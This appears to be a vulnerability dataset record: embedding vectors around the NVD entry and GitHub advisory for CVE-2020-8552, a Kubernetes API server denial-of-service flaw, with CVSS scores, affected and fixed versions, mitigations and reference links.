-0.013147137127816677, -0.01838633604347706, 0.011105891317129135, 0.015694914385676384, -0.028305280953645706, 0.003965309821069241, 0.010909326374530792, 0.010735442861914635, 0.0028048234526067972, 0.008747117593884468, -0.017085986211895943, -0.024676397442817688, 0.020790470764040947, -0.021228959783911705, 0.011567061766982079, 0.016224127262830734, -0.02429839037358761, -0.016526533290743828, 0.01822001300752163, -0.0019561941735446453, 0.0033888467587530613, -0.014137519523501396, -0.017826883122324944, -0.016949903219938278, -0.014523088932037354, 0.027125893160700798, 0.020019331946969032, 0.005666348151862621, -0.03163175657391548, -0.007163261994719505, 0.011438538320362568, -0.013706590048968792, -0.014908657409250736, 0.00019077619072049856, -0.003908608574420214, 0.005794871132820845, -0.004343318287283182, 0.021455764770507812, -0.01800832711160183, -0.004483181517571211, 0.015006938949227333, -0.013101776130497456, -0.0009440763387829065, -0.010342313908040524, -0.012791809625923634, 0.00951069500297308, 0.0002726386592257768, 0.0025005266070365906, -0.019883248955011368, -0.009351931512355804, 0.021591847762465477, 0.015241304412484169, -0.0026101490948349237, -0.015256425365805626, 0.004558783024549484, -0.0032395331654697657, -0.013510025106370449, -0.01880970597267151, 0.03429293632507324, 0.014122399501502514, 0.01459868997335434, 0.0037328344769775867, 0.002394684124737978, 0.02077534981071949, -0.0018938228022307158, 0.005639887414872646, -0.011763625778257847, -0.016692858189344406, 0.002778362948447466, 0.012489402666687965, 0.011824107728898525, 0.010637160390615463, -0.01465161144733429, 0.008701756596565247, 0.021244080737233162, -0.0014402125962078571, -0.0026252693496644497, 0.05443323031067848, -0.011733385734260082, 0.004449160769581795, -0.002370113506913185, 0.013948515057563782, 0.004449160769581795, -0.002455165609717369, 0.0043281977996230125, -0.027927272021770477, 0.0045096417888998985, 0.01084128487855196, 0.013888034038245678, -0.0018503518076613545, 0.0091856075450778, 0.0015611753333359957, 0.017766401171684265, 0.019354037940502167, -0.021440645679831505, 0.014424806460738182, -0.013540266081690788, -0.00916292704641819, -0.006116178352385759, 0.011121011339128017, 0.003919948823750019, 0.03217608854174614, -0.006762573029845953, 0.0004176994552835822, 0.006025456357747316, -0.003069429425522685, -0.006082157604396343, -0.0002575183170847595, 0.0055831861682236195, -0.009979425929486752, 0.009299010038375854, 0.00990382395684719, 0.017116226255893707, 0.008709317073225975, 0.010743003338575363, 0.010690081864595413, 0.02147088572382927, -0.00431307777762413, -0.03010460175573826, 0.005946074612438679, 0.03099670074880123, -0.004452940542250872, -0.012799369171261787, -0.027791189029812813, 0.007390066981315613, 0.006838174536824226, 0.008240586146712303, -0.024147186428308487, 0.023557493463158607, -0.0064828465692698956, -0.008542993105947971, 0.01912723295390606, 0.01693478226661682, -0.0073484862223267555, 0.016919663175940514, -0.016118284314870834, 0.0003324112622067332, -0.017055746167898178, -0.017509356141090393, 0.020956793799996376 ]
1,750
CVE-2020-8552
2020-03-27T15:15:12.757000
The Kubernetes API server component in versions prior to 1.15.9, 1.16.0-1.16.6, and 1.17.0-1.17.2 has been found to be vulnerable to a denial of service attack via successful API requests.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 1.4, "source": "jordan@liggitt.net", "type": "Secondary" } ] }
[ { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/89378" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://groups.google.com/forum/#%21topic/kubernetes-security-announce/2UOlsba2g0s" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3SOCLOPTSYABTE4CLTSPDIFE6ZZZR4LX/" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20200413-0003/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "07761E41-21F4-466F-A602-4DC9BD1257CE", "versionEndExcluding": null, "versionEndIncluding": "1.15.9", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "02C07F21-ECB7-4BD2-85AF-C2BB24F175FF", "versionEndExcluding": null, "versionEndIncluding": "1.16.6", "versionStartExcluding": null, "versionStartIncluding": "1.16.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "DE0FF258-1EFA-4FF0-84C7-B2976BD70BD3", "versionEndExcluding": null, "versionEndIncluding": "1.17.2", "versionStartExcluding": null, "versionStartIncluding": "1.17.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/kubernetes/kubernetes/issues/89378
[ "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) (Medium) The Kubernetes API server has been found to be vulnerable to a denial of service attack via authorized API requests. ### Am I vulnerable? If an attacker that can make an authorized resource request to an unpatched API server (see below), then you are vulnerable to this. Prior to v1.14, this was possible via unauthenticated requests by default. #### Affected Versions - kube-apiserver v1.17.0 - v1.17.2 - kube-apiserver v1.16.0 - v1.16.6 - kube-apiserver < v1.15.10 ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by: - Preventing unauthenticated or unauthorized access to all apis - The apiserver should auto restart if it OOMs #### Fixed Versions - v1.17.3 - v1.16.7 - v1.15.10 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster #### Acknowledgements This vulnerability was reported by: Gus Lees (Amazon) /area security /kind bug /committee product-security /sig api-machinery
CVE-2020-8552: apiserver DoS (oom)
https://api.github.com/repos/kubernetes/kubernetes/issues/89378/comments
4
2020-03-23T18:35:34
2021-12-02T22:55:22Z
https://github.com/kubernetes/kubernetes/issues/89378
586,429,123
89,378
true
This is a GitHub Issue repo:kubernetes owner:kubernetes Title : CVE-2020-8552: apiserver DoS (oom) Issue date: --- start body --- CVSS Rating: [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L) (Medium) The Kubernetes API server has been found to be vulnerable to a denial of service attack via authorized API requests. ### Am I vulnerable? If an attacker that can make an authorized resource request to an unpatched API server (see below), then you are vulnerable to this. Prior to v1.14, this was possible via unauthenticated requests by default. #### Affected Versions - kube-apiserver v1.17.0 - v1.17.2 - kube-apiserver v1.16.0 - v1.16.6 - kube-apiserver < v1.15.10 ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by: - Preventing unauthenticated or unauthorized access to all apis - The apiserver should auto restart if it OOMs #### Fixed Versions - v1.17.3 - v1.16.7 - v1.15.10 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-management/#upgrading-a-cluster #### Acknowledgements This vulnerability was reported by: Gus Lees (Amazon) /area security /kind bug /committee product-security /sig api-machinery --- end body ---
1,364
[ -0.02498926967382431, -0.015770198777318, -0.0033366752322763205, 0.015239403583109379, 0.015351150184869766, -0.02547816000878811, 0.002973499707877636, 0.03905533626675606, 0.005824776832014322, -0.005084457341581583, -0.019346080720424652, -0.005084457341581583, 0.013276859186589718, 0.008073671720921993, 0.029193725436925888, 0.03355183079838753, -0.013025430031120777, -0.02498926967382431, 0.0002061413979390636, 0.013619082048535347, -0.01415686123073101, -0.0023187361657619476, -0.0033995325211435556, 0.03181976452469826, 0.00117159029468894, 0.03327246755361557, 0.01977909728884697, 0.025548001751303673, -0.02137148380279541, 0.001024050172418356, 0.018130840733647346, 0.006229856982827187, -0.022293390706181526, 0.034725166857242584, 0.05095632001757622, -0.0017364330124109983, 0.04196074232459068, 0.04148581996560097, -0.023774029687047005, -0.027978483587503433, -0.027433721348643303, -0.03246230632066727, -0.0050949337892234325, 0.01651051826775074, -0.012746063992381096, -0.0158121045678854, -0.008890816010534763, -0.02479371428489685, 0.011928919702768326, 0.013193049468100071, 0.014268607832491398, -0.04545281454920769, -0.030031822621822357, -0.05509093403816223, 0.00314286514185369, -0.014848291873931885, -0.007085415069013834, 0.014121940359473228, -0.007668591104447842, -0.029920076951384544, -0.008548593148589134, 0.007382241077721119, 0.01987687684595585, 0.02781086415052414, -0.020589258521795273, 0.034529611468315125, 0.001076431362889707, 0.012327015399932861, -0.05810808390378952, 0.0130882877856493, -0.034082625061273575, -0.0053079500794410706, -0.020002590492367744, 0.024123236536979675, 0.04874933138489723, -0.016077501699328423, 0.025659747421741486, 0.04472646489739418, -0.05196203663945198, -0.00015572459960822016, -0.011027964763343334, 0.038999464362859726, -0.0019695288501679897, 0.014764482155442238, 0.03450167551636696, -0.020714974030852318, -0.03902740031480789, -0.07688146829605103, -0.008813990280032158, -0.03564707562327385, -0.01690163090825081, 0.01222225371748209, 0.011433045379817486, -0.015197498723864555, 0.04120645299553871, -0.019960686564445496, -0.045592498034238815, -0.02514292113482952, -0.04240772873163223, 0.01160066481679678, -0.045285195112228394, -0.02989213913679123, 0.009805738925933838, 0.01744639314711094, 0.016622263938188553, 0.0388597808778286, -0.005667633377015591, 0.022824184969067574, -0.01465273555368185, 0.1342073231935501, 0.026162605732679367, 0.013605114072561264, -0.05006235092878342, -0.005618744529783726, -0.015197498723864555, 0.027838801965117455, -0.011223521083593369, 0.00838097371160984, -0.09163197875022888, -0.012578444555401802, -0.03276960551738739, -0.05165473371744156, -0.01929020881652832, -0.006718747317790985, -0.03293722867965698, 0.026358162984251976, 0.002004449488595128, 0.027154354378581047, -0.03858041763305664, -0.005367315374314785, -0.0010659551480785012, 0.01734861545264721, -0.0351162813603878, -0.004745726473629475, -0.003705088747665286, -0.005866681691259146, 0.003233659081161022, 0.06034301221370697, 0.0028844517655670643, 0.021385451778769493, -0.02816007100045681, -0.018703538924455643, 0.007591765373945236, -0.0018996873404830694, -0.006718747317790985, 0.004777154885232449, -0.014205750077962875, -0.008583514019846916, -0.01571432501077652, 0.023871807381510735, 0.0020358781330287457, -0.02028195559978485, 0.019066715613007545, 0.017041312530636787, 0.03357976675033569, -0.054420456290245056, 0.00849970430135727, 0.008827959187328815, 0.010650821030139923, 0.031261030584573746, 0.015085753053426743, -0.03659692034125328, 0.004965726751834154, -0.03313278406858444, 0.011279393918812275, 0.007507955655455589, 0.025743557140231133, 0.0038447717670351267, 0.0033977865241467953, 0.028690867125988007, -0.007940972223877907, -0.024570221081376076, 0.03693215921521187, 0.02866292931139469, -0.020044496282935143, 0.011649553664028645, 0.024332759901881218, 0.030674364417791367, 0.007228590082377195, 0.020142273977398872, 0.002123180078342557, 0.042659156024456024, -0.020505448803305626, -0.01705528236925602, 0.04075947031378746, -0.031652145087718964, -0.035870566964149475, 0.0009472246165387332, -0.004001914989203215, 0.0025474668946117163, 0.005699062254279852, 0.00639747641980648, -0.0070260497741401196, -0.022991804406046867, -0.026944831013679504, 0.008681291714310646, -0.010629868134856224, -0.01098605990409851, 0.06296905130147934, -0.02910991571843624, -0.0016185755375772715, -0.02187434211373329, -0.03807755559682846, 0.005018108058720827, -0.02975245751440525, 0.004640964325517416, 0.007053986191749573, 0.011880029924213886, 0.01948576420545578, -0.007249542511999607, -0.03385913372039795, -0.012264158576726913, -0.003092230064794421, 0.020491480827331543, 0.014638767577707767, -0.0010493677109479904, -0.014638767577707767, 0.02250291407108307, -0.03084198385477066, -0.018466079607605934, 0.02160894311964512, -0.03262992575764656, 0.014017178677022457, -0.018172744661569595, 0.008059702813625336, -0.030367061495780945, 0.010406375862658024, -0.032099127769470215, 0.006624461151659489, -0.002269847085699439, 0.015979724004864693, -0.009016530588269234, 0.009652088396251202, 0.028243880718946457, 0.029081979766488075, -0.02811816707253456, 0.011447013355791569, 0.010029232129454613, -0.0000720785537851043, -0.008639386855065823, 0.0063171591609716415, 0.00135055894497782, -0.020896561443805695, -0.021581007167696953, -0.006551127880811691, 0.0460115447640419, -0.01923433504998684, -0.00021323467080947012, -0.006460333708673716, 0.03645723685622215, -0.03296516463160515, 0.005667633377015591, -0.028132135048508644, -0.011398124508559704, 0.02051941677927971, -0.002510800026357174, 0.003586358390748501, -0.01889909617602825, -0.043162014335393906, 0.009240023791790009, 0.06386301666498184, 0.017069250345230103, -0.023480694741010666, 0.051542989909648895, -0.008576530031859875, -0.015560674481093884, -0.005405728239566088, 0.01123050507158041, 0.0008036131621338427, -0.014317496679723263, 0.00003276545976405032, 0.019360048696398735, -0.0261346697807312, -0.016538454219698906, 0.01247368287295103, -0.005360330920666456, 0.004881917033344507, 0.04321788623929024, 0.02726610191166401, -0.0065616038627922535, 0.0014719085302203894, -0.030311187729239464, -0.017530202865600586, -0.009673040360212326, 0.00651969900354743, 0.009253991767764091, 0.001278098439797759, -0.05215759202837944, 0.027880705893039703, 0.011195584200322628, -0.015057816170156002, 0.002725562546402216, -0.04196074232459068, 0.001165479188784957, 0.007235574070364237, 0.03634548932313919, 0.02633022516965866, 0.020659100264310837, -0.01913655735552311, -0.01132828276604414, -0.016747979447245598, 0.009875580668449402, 0.020044496282935143, 0.007738432381302118, -0.030227378010749817, -0.00480858376249671, -0.03360770642757416, 0.016287025064229965, 0.004232391715049744, 0.020854655653238297, 0.016747979447245598, -0.046626150608062744, 0.0027342927642166615, -0.0279226116836071, 0.0056501729413867, 0.015323213301599026, 0.012054634280502796, -0.020701006054878235, -0.011125742457807064, 0.020994339138269424, 0.02063116431236267, -0.007158748339861631, -0.016035595908761024, 0.04461471736431122, 0.015141625888645649, -0.0379658117890358, -0.03838485851883888, 0.02484958805143833, -0.05210172012448311, 0.011314314790070057, -0.02137148380279541, 0.012110507115721703, -0.010748598724603653, -0.030087696388363838, -0.010797487571835518, -0.024626094847917557, -0.029724519699811935, 0.01549083273857832, 0.03335627540946007, -0.016929566860198975, 0.01390543207526207, -0.03411056473851204, -0.027196260169148445, 0.005618744529783726, -0.0004384733329061419, 0.016845757141709328, -0.023327043280005455, -0.02088259346783161, 0.02187434211373329, -0.031205158680677414, 0.0007878988399170339, 0.03654104471206665, 0.005028584040701389, 0.051542989909648895, 0.029528964310884476, -0.0053568389266729355, -0.00591207854449749, 0.0056222365237772465, 0.00850668828934431, -0.018228618428111076, 0.044055987149477005, -0.016873693093657494, 0.004766678903251886, 0.009267959743738174, -0.0010834154672920704, -0.0017984173027798533, 0.0007477399776689708, 0.0032790559343993664, -0.021888310089707375, -0.014848291873931885, -0.006484778597950935, 0.021343545988202095, 0.04587186127901077, 0.008360021747648716, -0.03168008103966713, -0.01217336393892765, -0.002477625384926796, -0.002736038761213422, -0.030227378010749817, 0.01740448921918869, -0.02498926967382431, -0.0017643695464357734, 0.023690219968557358, -0.014540989883244038, 0.04075947031378746, 0.002627784386277199, 0.008485736325383186, 0.03084198385477066, -0.009477484039962292, 0.027782928198575974, -0.04103883355855942, 0.04573218151926994, -0.034389927983284, -0.03802168369293213, -0.022894026711583138, 0.014946069568395615, -0.008059702813625336, -0.019401954486966133, 0.025967050343751907, -0.02701467275619507, 0.027056576684117317, 0.042966458946466446, 0.0027796896174550056, 0.02910991571843624, 0.009945422410964966, 0.0034833422396332026, -0.0002804570540320128, -0.027294037863612175, -0.00810160767287016, -0.025212762877345085, -0.001306908088736236, 0.0061355712823569775, -0.031261030584573746, 0.014066067524254322, 0.00214937049895525, 0.06838874518871307, 0.050006475299596786, -0.018116870895028114, 0.0017984173027798533, 0.037211522459983826, -0.018605761229991913, 0.007885099388659, 0.026400066912174225, 0.01998862251639366, -0.003970486111938953, 0.01465273555368185, 0.016524486243724823, 0.011000027880072594, 0.033188655972480774, -0.02086862549185753, 0.018368300050497055, 0.006341603584587574, 0.020142273977398872, -0.003080007852986455, -0.024332759901881218, 0.0046165199019014835, -0.017180996015667915, -0.01913655735552311, 0.0021912753582000732, 0.007626686245203018, -0.035619139671325684, 0.0027849278412759304, -0.038803908973932266, 0.013877496123313904, -0.03427818417549133, -0.039334703236818314, -0.011146695353090763, -0.010357487015426159, -0.019513700157403946, -0.04020073637366295, -0.03053468093276024, -0.009142245166003704, 0.00013760947331320494, 0.0013156383065506816, 0.01477845013141632, -0.008967641741037369, -0.017027344554662704, -0.01616131141781807, 0.021525133401155472, -0.01542099192738533, 0.011684474535286427, 0.013018446043133736, -0.0015661944635212421, 0.05338680371642113, 0.010567011311650276, 0.03757469728589058, -0.019821003079414368, -0.07135002315044403, 0.017683854326605797, -0.03385913372039795, 0.007179700769484043, 0.05305156484246254, 0.016817821189761162, 0.0014265115605667233, -0.010720661841332912, 0.01699940860271454, -0.014485116116702557, 0.0033366752322763205, -0.012012729421257973, 0.01321400236338377, -0.00197127484716475, -0.01610543765127659, -0.004578107036650181, 0.01120256818830967, -0.007445098366588354, -0.025869272649288177, -0.013926384970545769, 0.018731476739048958, -0.021692752838134766, 0.01705528236925602, 0.024165140464901924, -0.016929566860198975, -0.030255315825343132, -0.05528648942708969, 0.020198145881295204, -0.007626686245203018, -0.003137627150863409, -0.03000388666987419, 0.06028713658452034, -0.003897152841091156, 0.008094623684883118, -0.027741022408008575, 0.012808921746909618, -0.025352446362376213, 0.003338421229273081, -0.04224010929465294, -0.009812723845243454, 0.06369540095329285, -0.03575882315635681, 0.004214931279420853, 0.0007193668861873448, -0.023173391819000244, 0.003357627661898732, -0.007438114378601313, -0.017739728093147278, -0.020393703132867813, 0.023019740357995033, -0.019821003079414368, 0.051291558891534805, 0.029333408921957016, -0.027852769941091537, -0.024221014231443405, 0.010259708389639854, -0.006254301872104406, -0.02905404195189476, -0.009184150025248528, 0.04039629176259041, 0.01968131959438324, -0.0038412795402109623, -0.043804556131362915, 0.03123309463262558, 0.00012429595517460257, -0.028383564203977585, 0.0031149284914135933, 0.002657467033714056, 0.027349911630153656, -0.006125094834715128, -0.009638119488954544, -0.012340984307229519, 0.004990171641111374, -0.010818440467119217, 0.02866292931139469, -0.03181976452469826, -0.015113689005374908, -0.04279883950948715, 0.011558759957551956, -0.01610543765127659, -0.004585091024637222, 0.004626995883882046, -0.018703538924455643, 0.019667351618409157, -0.018019093200564384, 0.008094623684883118, 0.03290928900241852, -0.008415894582867622, -0.023774029687047005, 0.01952766813337803, 0.03201531991362572, 0.003897152841091156, -0.017320679500699043, -0.016426708549261093, 0.00030708411941304803, -0.006711763329803944, -0.02642800472676754, 0.006551127880811691, -0.032797545194625854, -0.01775369606912136, -0.0042987409979105, -0.009833675809204578, -0.0065127150155603886, 0.02349466271698475, -0.010601932182908058, -0.016636233776807785, -0.01477845013141632, -0.02236323244869709, 0.03366357833147049, -0.015197498723864555, -0.010287645272910595, -0.03137277811765671, -0.008199386298656464, 0.003214452648535371, 0.008541609160602093, 0.007130811922252178, 0.022251484915614128, 0.026400066912174225, -0.002161592710763216, 0.016692105680704117, -0.0005094060325063765, -0.00008468275336781517, -0.017977189272642136, 0.026623560115695, 0.005583823658525944, -0.021008307114243507, -0.03679247573018074, 0.013765749521553516, -0.000019833880287478678, 0.028886422514915466, 0.0025090540293604136, 0.012333999387919903, -0.015099721029400826, -0.015686389058828354, 0.006435889285057783, -0.0019136556657031178, -0.011635584756731987, -0.021734658628702164, 0.07213224470615387, 0.0011174632236361504, 0.04313407838344574, -0.006261285860091448, 0.03992137312889099, -0.023131487891077995, 0.0015792897902429104, 0.038552477955818176, -0.015197498723864555, 0.018452109768986702, -0.010573995299637318, 0.008597481995821, 0.013772733509540558, 0.004173026420176029, 0.013332732021808624, 0.014960038475692272, -0.011118758469820023, 0.015057816170156002, -0.030925793573260307, 0.0035723899491131306, 0.006785096600651741, 0.009456532076001167, -0.005636204965412617, -0.004997155629098415, 0.012271142564713955, -0.03240643069148064, -0.014918133616447449, -0.001959052635356784, -0.02082671970129013, -0.028439437970519066, 0.02741975337266922, 0.005412712227553129, -0.029612774029374123, -0.020798783749341965, -0.03645723685622215, -0.016440676525235176, 0.0018857191316783428, -0.03832898661494255, 0.029389280825853348, -0.01973719336092472, 0.01711115427315235, -0.018633699044585228, 0.018773380666971207, 0.008988594636321068, 0.029975948855280876, -0.009582246653735638, -0.015476864762604237, -0.016384802758693695, 0.025743557140231133, -0.001155002973973751, 0.002276831306517124, 0.07012081146240234, 0.036066122353076935, -0.0175581406801939, 0.0005299219628795981, -0.0018542904872447252, -0.030227378010749817, -0.006774620618671179, -0.0022681010887026787, 0.011125742457807064, -0.023410852998495102, -0.029780393466353416, 0.022894026711583138, -0.006516207009553909, 0.04472646489739418, -0.009945422410964966, -0.005398743785917759, -0.001165479188784957, -0.008450815454125404, -0.026092765852808952, -0.006945732049643993, 0.0007368272636085749, 0.01571432501077652, -0.016817821189761162, -0.011000027880072594, -0.008667323738336563, -0.021986087784171104, -0.02994801290333271, 0.028970232233405113, -0.023117519915103912, -0.007200653199106455, -0.00566414138302207, -0.00947050005197525, 0.0032825481612235308, -0.018633699044585228, 0.01814480870962143, -0.021553071215748787, 0.021050212904810905, -0.005992396268993616, -0.00038260017754510045, -0.016077501699328423, 0.005213663913309574, 0.0009838914265856147, 0.001470162533223629, -0.030115632340312004, -0.018703538924455643, 0.02003052644431591, -0.009442564100027084, 0.03059055469930172, -0.002152862725779414, 0.03841279819607735, -0.0013531780568882823, 0.0068095410242676735, 0.018605761229991913, 0.027084512636065483, -0.019723225384950638, -0.0015356388175860047, -0.011118758469820023, 0.0334121473133564, 0.0003568461397662759, 0.008695260621607304, 0.021343545988202095, 0.003542707534506917, -0.008911768905818462, -0.0024793713819235563, 0.0004129375738557428, -0.022237516939640045, 0.005063504911959171, -0.03777025640010834, -0.007088907063007355, -0.009191134944558144, 0.013891464099287987, -0.010266692377626896, 0.010168914683163166, 0.009945422410964966, -0.010385422967374325, -0.03179182857275009, -0.021329578012228012, 0.000591469753999263, 0.013968289829790592, 0.022433072328567505, 0.02845340594649315, 0.01328384317457676, 0.036317553371191025, 0.013528288342058659, 0.00592604698613286, -0.01808893494307995, 0.04746424779295921, -0.03712771460413933, 0.011398124508559704, -0.0028739755507558584, 0.024374665692448616, 0.01452702097594738, -0.01908068358898163, 0.0229638684540987, 0.001024923287332058, 0.0015915120020508766, -0.012257173657417297, -0.0113003458827734, -0.001864766702055931, -0.02557593770325184, 0.007920020259916782, 0.012948604300618172, 0.007221605628728867, 0.03835692256689072, 0.014003210701048374, 0.02642800472676754, 0.002365879015997052, -0.0023519108071923256, 0.017977189272642136, -0.030255315825343132, 0.01477845013141632, -0.008422878570854664, -0.008492720313370228, 0.008387957699596882, 0.01592385023832321, -0.011635584756731987, -0.03246230632066727, 0.00504604447633028, 0.0044523924589157104, 0.00010345264308853075, -0.006509223021566868, -0.003146357135847211, 0.004277788568288088, 0.025059111416339874, -0.04394423961639404, -0.0005399616784416139, 0.009938438422977924, 0.028439437970519066, -0.021259736269712448, -0.006820017471909523, 0.011195584200322628, 0.0018176237354055047, 0.003869216190651059, 0.04006105288863182, -0.03450167551636696, -0.0014404798857867718, 0.03614993393421173, -0.02572958916425705, 0.016440676525235176, -0.01808893494307995, 0.007738432381302118, -0.014987974427640438, 0.00785716250538826, -0.0128438426181674, -0.0009000816498883069, 0.02543625608086586, 0.001368892379105091, 0.027252132073044777, -0.022335294634103775, -0.020603226497769356, -0.006757160183042288, 0.008716212585568428, -0.02751753106713295, -0.003890168620273471, -0.003890168620273471, 0.018619729205965996, -0.01631496287882328, 0.025324508547782898, -0.012948604300618172, -0.02384386956691742, -0.015309245325624943, 0.007312399800866842, -0.004714297596365213, -0.008429862558841705, 0.008939705789089203, -0.0029106424190104008, -0.010322566144168377, -0.00614953925833106, 0.011495902203023434, -0.00949145294725895, -0.004745726473629475, 0.022698471322655678, 0.011782252229750156, -0.006463826168328524, 0.011586695909500122, -0.016580360010266304, 0.01660829596221447, 0.020701006054878235, -0.012746063992381096, 0.010532090440392494, 0.009707961231470108, -0.00764763867482543, -0.00041206454625353217, 0.02767118252813816, 0.01148193422704935, -0.023313075304031372, -0.021581007167696953, 0.0019381002057343721, 0.017236869782209396, -0.024723872542381287, -0.03123309463262558, -0.0275594349950552, -0.0026050859596580267, -0.028299754485487938, -0.002004449488595128, -0.03553532809019089, 0.0011523838620632887, 0.00934478547424078, 0.009798754937946796, 0.004916837904602289, 0.017320679500699043, -0.0006381762214004993, -0.009763834066689014, 0.01343749463558197, 0.01160066481679678, 0.010916218161582947, 0.0024147680960595608, 0.0005569855566136539, 0.011286377906799316, 0.017390521243214607, 0.017083218321204185, -0.031903572380542755, -0.029920076951384544, -0.025548001751303673, -0.00714128790423274, 0.0011576219694688916, 0.00651969900354743, -0.004448899999260902, -0.0369880311191082, 0.003994931001216173, 0.008800022304058075, -0.0002878777158912271, -0.010029232129454613, 0.0049133459106087685, -0.009295896627008915, 0.027629276737570763, -0.028299754485487938, 0.03268579766154289, 0.05003441497683525, -0.024570221081376076, 0.020756877958774567, -0.022586723789572716, 0.0017495282227173448, -0.02722419612109661, -0.0048784250393509865, -0.015686389058828354, -0.022251484915614128, -0.031456589698791504, 0.02032386139035225, 0.04120645299553871, 0.004476836882531643, -0.008485736325383186, -0.020212115719914436, -0.007179700769484043, 0.0008930974872782826, -0.02666546404361725, -0.009728914126753807, -0.012033681385219097, 0.005248584784567356, 0.004375566728413105, 0.03922295570373535, -0.013444478623569012, 0.011670505627989769, -0.014862259849905968, -0.003203976433724165, -0.006474302150309086, -0.026358162984251976, -0.02994801290333271, -0.012529555708169937, 0.01596575416624546, -0.03972581401467323, -0.010406375862658024, 0.004211439285427332, 0.02086862549185753, 0.014582894742488861, 0.005880650132894516, -0.011321298778057098, 0.037882000207901, -0.0055558872409164906, -0.011537807062268257, -0.007996845990419388, 0.0049308063462376595, 0.007542876526713371, 0.004057788290083408, 0.01864766702055931, -0.013102255761623383, -0.03506040573120117, 0.025073079392313957, -0.001959052635356784, -0.04034041985869408, -0.020840687677264214, 0.005496521946042776, 0.003022388555109501, -0.02899817004799843, -0.01477845013141632, 0.009302880614995956, 0.022419104352593422, -0.014205750077962875, 0.024779746308922768, 0.007193669211119413, 0.019024809822440147, -0.026190543547272682, 0.001610718434676528, 0.02498926967382431, -0.026246415451169014, 0.002978737698867917, 0.040982961654663086, -0.01769782230257988, -0.0194298904389143, 0.0023501648101955652, -0.024416569620370865, 0.018452109768986702, 0.006076205987483263, -0.030422935262322426, -0.003231913084164262, -0.009309864602982998, 0.021329578012228012, -0.0030415949877351522, 0.0025300064589828253, 0.0180470310151577, -0.024081330746412277, 0.012892731465399265, 0.02008640021085739, -0.012808921746909618, 0.02384386956691742, 0.011593679897487164, -0.004515249747782946, 0.009924469515681267, 0.013891464099287987, 0.01829846017062664, 0.014638767577707767, -0.014736545272171497, -0.008038750849664211, -0.018801318481564522, 0.002606831956654787, -0.02286609075963497, 0.012201300822198391, -0.03207119181752205, -0.007822242565453053, 0.0189829058945179, -0.0029595312662422657, 0.03288135305047035, -0.03564707562327385, -0.01948576420545578, 0.017460361123085022, -0.0013950829161331058, 0.03078611008822918, -0.039139147847890854, -0.0006905572954565287, -0.015001943334937096, 0.00150944828055799, -0.0459277369081974, -0.03383119776844978, -0.0377981923520565, -0.0248356182128191, -0.009135261178016663, 0.005761919543147087, 0.021636880934238434, 0.03489278629422188, -0.012906699441373348, 0.0288584865629673, -0.013898448087275028, -0.007382241077721119, -0.02205592952668667, -0.022935930639505386, -0.002929848851636052, 0.012082570232450962, -0.022153707221150398, -0.0034990564454346895, -0.004766678903251886, 0.02329910732805729, 0.017739728093147278, -0.007878115400671959, 0.02602292411029339, -0.029724519699811935, 